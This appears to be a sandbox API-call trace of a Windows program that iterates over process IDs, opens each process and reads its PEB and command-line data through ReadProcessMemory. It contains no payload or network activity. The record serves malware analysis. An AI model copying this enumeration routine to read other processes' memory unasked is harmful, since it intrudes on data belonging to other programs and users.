[0412.918] free (_Block=0x2c1680)
[0412.919] CloseHandle (hObject=0x24c) returned 1
[0412.920] _ui64tow (_Value=0xbe4, _Buffer="3036", _Radix=10) returned="3044"
[0412.924] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3044") returned 4
[0412.925] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.925] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.947] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x24c
[0412.947] GetLastError () returned 0x0
[0412.947] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.947] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2428f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2426e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.949] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.951] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.951] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.951] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.952] malloc (_Size=0x62) returned 0x2c0790
[0412.952] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x24273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.952] free (_Block=0x2c0790)
[0412.953] CloseHandle (hObject=0x24c) returned 1
[0412.955] _ui64tow (_Value=0xbec, _Buffer="3044", _Radix=10) returned="3052"
[0412.961] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3052") returned 4
[0412.962] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.986] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x24c
[0412.986] GetLastError () returned 0x0
[0412.986] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.986] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4328c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4326de, lpBuffer=0x12dd100, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.988] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.988] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.988] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] malloc (_Size=0x54) returned 0x2b9ad0
[0412.989] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x43272a, lpBuffer=0x2b9ad0, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b9ad0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] free (_Block=0x2b9ad0)
[0412.989] CloseHandle (hObject=0x24c) returned 1
[0412.990] _ui64tow (_Value=0xbf4, _Buffer="3052", _Radix=10) returned="3060"
[0412.993] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3060") returned 4
[0412.994] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.994] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x24c
[0413.012] GetLastError () returned 0x0
[0413.012] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6228d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.013] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226da, lpBuffer=0x12dd100, nSize=0x54, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.013] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.014] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.014] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.014] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.015] malloc (_Size=0x5c) returned 0x2c0790
[0413.015] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x62272e, lpBuffer=0x2c0790, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.015] free (_Block=0x2c0790)
[0413.016] CloseHandle (hObject=0x24c) returned 1
[0413.016] _ui64tow (_Value=0xbfc, _Buffer="3060", _Radix=10) returned="3068"
[0413.020] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3068") returned 4
[0413.021] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.021] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.042] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x24c
[0413.042] GetLastError () returned 0x0
[0413.042] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.042] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d28d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d26de, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.044] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.045] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.045] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.045] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.046] malloc (_Size=0x5e) returned 0x2c0720
[0413.046] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d2734, lpBuffer=0x2c0720, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0413.046] free (_Block=0x2c0720)
[0413.047] CloseHandle (hObject=0x24c) returned 1
[0413.047] _ui64tow (_Value=0x304, _Buffer="3068", _Radix=10) returned="772"
[0413.052] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="772") returned 3
[0413.053] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.053] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.079] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x24c
[0413.079] GetLastError () returned 0x0
[0413.080] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x826de, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.081] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.082] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x81ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] malloc (_Size=0x58) returned 0x2b99b0
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x8272e, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] free (_Block=0x2b99b0)
[0413.084] CloseHandle (hObject=0x24c) returned 1
[0413.085] _ui64tow (_Value=0x310, _Buffer="772", _Radix=10) returned="784"
[0413.090] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="784") returned 3
[0413.091] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.091] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.113] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x310) returned 0x24c
[0413.113] GetLastError () returned 0x0
[0413.113] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.113] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226f6, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.115] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.117] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] malloc (_Size=0x82) returned 0x2e3b90
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622770, lpBuffer=0x2e3b90, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] free (_Block=0x2e3b90)
[0413.118] CloseHandle (hObject=0x24c) returned 1
[0413.119] _ui64tow (_Value=0x754, _Buffer="784", _Radix=10) returned="1876"
[0413.124] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1876") returned 4
[0413.125] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.125] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.147] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x24c
[0413.147] GetLastError () returned 0x0
[0413.147] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6128f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6126d8, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.149] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.150] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.150] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.150] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x611ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.151] malloc (_Size=0x68) returned 0x2c0800
[0413.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x612738, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0413.151] free (_Block=0x2c0800)
[0413.152] CloseHandle (hObject=0x24c) returned 1
[0413.152] _ui64tow (_Value=0x444, _Buffer="1876", _Radix=10) returned="1092"
[0413.157] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1092") returned 4
[0413.158] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.158] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.185] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x24c
[0413.185] GetLastError () returned 0x0
[0413.185] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.185] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.185] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d2880, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d26ce, lpBuffer=0x12dd100, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.187] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.188] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.188] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.188] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.189] malloc (_Size=0x44) returned 0x2bd2c0
[0413.189] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d270a, lpBuffer=0x2bd2c0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd2c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.189] free (_Block=0x2bd2c0)
[0413.190] CloseHandle (hObject=0x24c) returned 1
[0413.191] _ui64tow (_Value=0x828, _Buffer="1092", _Radix=10) returned="2088"
